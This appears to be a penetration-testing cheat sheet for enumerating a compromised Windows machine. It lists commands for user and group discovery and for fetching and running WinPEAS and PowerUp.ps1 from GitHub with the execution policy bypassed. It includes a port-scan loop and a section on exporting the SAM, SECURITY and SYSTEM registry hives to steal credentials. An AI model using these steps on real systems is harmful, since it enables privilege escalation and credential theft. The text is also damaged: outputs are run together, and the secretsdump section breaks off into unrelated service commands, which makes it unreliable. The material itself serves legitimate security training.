Get information about a compromised machine from the to find possible ways to escalate privileges
For enumeration of network protocols like SMB, RPC, or LDAP, see Enumeration.
Users
Users are important to understand on a computer or domain because they might have different or higher permissions than your current user. By understanding exactly how the users relate to each other and how privileges can be abused, you can quickly escalate privileges to reach the crown jewels.
For domain users/groups, BloodHound can enumerate and analyze all the connections between them for a better understanding, and possible privilege escalation methods.
Current User
The whoami command can tell you what user you are running as, as well as some more detailed information about privileges and groups, using the /all flag:
whoami /all
First comes simply the username, and their SID. The part before the \ tells you where the user comes from. If this is the same as the output for the hostname command, it is a local user on that computer.
USER INFORMATION----------------User Name SID==============================================================WORKSTATION\user S-1-5-21-5386719015-7638691639-2457330780-1001
Next is the group information containing all the groups you are in. Some default ones you will always find here, but others have interesting properties. Like BUILTIN\Remote Desktop Users which allows logging in via RDP (port 3389), or custom groups that have a long SID.
You will also always find the Mandatory Label\..., called "Integrity level". It is used as a base for what actions you can and can't do. It may have one of the following values:
System: SYSTEM (kernel, ...)
High: Elevated users (Administrators, with "Run as Administrator")
Medium: Standard users (default, most often seen)
Low: Restricted rights often used in sandboxed processes or for directories storing temporary data
Untrusted: Lowest integrity level with extremely limited access rights for processes or objects that pose the most potential risk
GROUP INFORMATION-----------------Group Name Type SID Attributes==================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
WORKSTATION\group Alias S-1-5-21-5386719015-7638691639-2457330780-1008 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Lastly, there are the Privileges, which all have their own special thing that you are allowed to do with this privilege. Some privileges like SeImpersonatePrivilege can be abused.
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeSecurityPrivilege Manage auditing and security log Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Local Users/Groups
While looking at our own user is interesting, we should be looking at how we attack other users, and exactly who to attack. To get all local users on a computer, use Get-LocalUser in PowerShell:
PS C:\>Get-LocalUserName Enabled Description----------------------Administrator False Built-in account for administering the computer/domainuser True DefaultAccount False A user account managed by the system.Guest False Built-in account for guest access to the computer/domainWDAGUtilityAccount False A user account managed and used by the system for Windows Defender Application Guard scen...
Users may be part of multiple Groups. There are many default groups windows uses, but custom ones can be made too. We can list them using Get-LocalGroup in PowerShell:
PS C:\>Get-LocalGroupName Description---------------groupAccess Control Assistance Operators Members of this group can remotely query authorization attributes and permission...Administrators Administrators have complete and unrestricted access to the computer/domainBackup Operators Backup Operators can override security restrictions for the sole purpose of back...Cryptographic Operators Members are authorized to perform cryptographic operations.Device Owners Members of this group can change system-wide settings.Distributed COM Users Members are allowed to launch, activate and use Distributed COM objects on this ...Event Log Readers Members of this group can read event logs from local machineGuests Guests have the same access as members of the Users group by default, except for...Hyper-V Administrators Members of this group have complete and unrestricted access to all features of H...IIS_IUSRS Built-in group used by Internet Information Services.Network Configuration Operators Members in this group can have some administrative privileges to manage configur...Performance Log Users Members of this group may schedule logging of performance counters, enable trace...Performance Monitor Users Members of this group can access performance counter data locally and remotelyPower Users Power Users are included for backwards compatibility and possess limited adminis...Remote Desktop Users Members in this group are granted the right to logon remotelyRemote Management Users Members of this group can access WMI resources over management protocols (such a...Replicator Supports file replication in a domainSystem Managed Accounts Group Members of this group are managed by the system.Users Users are prevented from making accidental or intentional system-wide changes an...
Lastly, to learn who are the members of a group, we can use Get-LocalGroupMember:
PS C:\> Get-LocalGroupMember group
ObjectClass Name PrincipalSource
----------- ---- ---------------
User WORKSTATION\user Local
Tip: Requesting this for theAdministrators group tells you who to target!
Domain Users/Groups
Local users/groups only work on one computer, but domain users/groups work on all domain-joined computers. To list all domain users, use the net user command with the /domain flag:
PS C:\> net user /domainUser accounts for \\DC1.corp.com-------------------------------------------------------------------------------Administrator user1 Guestuser2 admin1 admin2krbtgt
There you find some default users like Administrator, Guest, and krbtgt, but also all other users on the domain. To get more detailed information about one user, include their name in the command:
PS C:\> net user "admin1"/domainUser name admin1 Full NameCommentUser's comment...Local Group MembershipsGlobal Group memberships *Domain Users *Domain Admins
These users can also be part of groups, which you can list. There are several default groups all with their own special group policies saying what they can and can't do. List them with net group:
PS C:\> net group /domainGroup Accounts for \\DC1.corp.com-------------------------------------------------------------------------------*Cloneable Domain Controllers*Debug*Development*DnsUpdateProxy*Domain Admins*Domain Computers*Domain Controllers*Domain Guests*Domain Users*Enterprise Admins*Enterprise Key Admins*Enterprise Read-only Domain Controllers*Group Policy Creator Owners*Key Admins*Protected Users*Read-only Domain Controllers*Schema Admins
If we want to learn more about a custom group, or just see who is a member of the group, we can also include that group name in the command:
PS C:\> net group "Development"/domainGroup name DevelopmentCommentMembers-------------------------------------------------------------------------------user2
Useful Commands
This section contains a set of useful commands for CMD or PowerShell that you'll often look for while enumerating a compromised machine.
WinPEAS / PowerUp.ps1
Before doing manual enumeration, getting an idea of the system through automated means might be quicker. The WinPEAS script is a Windows equivalent to the well-known LinPEAS script for Linux. It enumerates many common misconfigurations in the system and tries to find vulnerabilities. This generates a lot of output to sift through, but it is a very useful output that normally would require a ton of manual work.
To run it, download the latest winPEASany.exe from the Releases page and download it from a local HTTP server if your target cannot access the public internet:
Run WinPEAS
cd /Windows/Tasks # world-writable directorywget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe-o winPEASany.exe.\winPEASany.exe|Tee-Object winPEAS.txt # write output to a file (may take long)
Another such tool is PowerUp.ps1 which looks for more directly exploitable vulnerabilities and has commands to automatically exploit them too:
Run PowerUp.ps1
wget https://github.com/PowerShellMafia/PowerSploit/raw/master/Privesc/PowerUp.ps1 -o PowerUp.ps1# It is a Module, and to import it we need to disable the execution policypowershell -ep bypass. .\PowerUp.ps1# Now that it is imported into the current shell, we can run its commandsInvoke-PrivescAudit
Networking
nc -v $IP $PORT
Test-NetConnection-Port 2210.10.10.10
nmap -p $PORTS $IP
1..1024|% {echo ((New-Object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "TCP port $_ is open"} 2>$null
↳ The above loop is very slow because it goes through ports one by one with a timeout
wmic logicaldisk get deviceid,volumename,description
Stealing SAM / SYSTEM files
One interesting location to check is C:\Windows\System32\config\, where normally only administrators should be able to read contents. Permissions may be misconfigured or you may find the same files backed up in another readable place, but these should be interesting:
SAM - stores local cached credentials, known as SAM secrets
SECURITY - stores domain cached credentials, known as LSA secrets
SYSTEM - contains information to decrypt both SAM and LSA secrets above
On a running system, you often cannot copy these files directly because they are in use. With backups, this is not the case, but on a running system you can use reg to export them live:
Export from live system
reg save HKLM\SAM "C:\Windows\Temp\SAM"reg save HKLM\SECURITY "C:\Windows\Temp\SECURITY"reg save HKLM\SYSTEM "C:\Windows\Temp\SYSTEM"
When these three files, either copied directly or exported, are copied to your local machine, it is time to extract credentials from them. Using secretsdump.py it is possible to parse the three files like so:
# List all servicesGet-CimInstance-ClassName win32_service | Select Name,State,PathName# Start/stop a service if you are allowednet stop $SERVICE_NAMEnet start $SERVICE_NAME